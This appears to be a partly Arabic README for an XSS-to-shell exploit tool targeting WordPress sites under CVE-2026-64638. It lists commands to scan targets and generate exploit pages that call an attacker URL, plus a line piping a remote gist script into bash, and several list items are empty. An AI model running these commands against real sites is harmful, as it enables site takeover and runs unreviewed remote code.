
CVE-2026-64638 - مسودة أو TODO
ادعم صيانة هذا المشروع عبر PayPal أو بمسح رمز الاستجابة السريعة أدناه.
استخدم هذا المشروع فقط في بيئات آمنة ومرخّص بها مثل:
مثال على الإعداد:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
مثال على الاستخدام:
# 1. Scanning Mode - Detect Vulnerable WordPress Sites:
# Scan a single URL
python xss2shell.py scan http://wp-vm.local
# Scan targets from file (one URL per line)
python xss2shell.py scan targets.txt
# Scan with custom settings
python xss2shell.py scan targets.txt --workers 10 --output my_results.json
# 2. Exploit Generation Mode - Create Exploit HTML Files
# Generate exploit for single target
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local
# Generate exploits for multiple targets from file
python xss2shell.py exploit targets.txt --attacker-url http://attacker-vm.local --output-dir exploits/
# Specify admin username
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local --admin-user administrator
ملاحظة:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y لإزالة مجلد .git المتداخلمستودع للتعلّم والاختبار والبحث في مفاهيم الأمن السيبراني في بيئات خاضعة للتحكم.
هذا المستودع مخصّص لأغراض البحث الأمني التعليمي والمرخّص فقط.
صُمم لمساعدة المستخدمين على التعلّم حول:
استخدم هذا المستودع فقط في البيئات التي لديك إذن باستخدامها، مثل:
الاستخدام غير المرخّص أو غير القانوني محظور تمامًا.
المؤلف والمساهمون غير مسؤولين عن أي ضرر أو إساءة استخدام أو مشكلات قانونية أو خسائر ناتجة عن هذا المشروع.
باستخدامك لهذا المستودع، فإنك توافق على أن:
هذا المشروع مخصّص لـ:
يرجى اتباع ممارسات الإفصاح المسؤول والامتثال لجميع القوانين المعمول بها.
للإفصاح المسؤول أو التعاون، تواصل مع القائم على صيانة المستودع عبر GitHub.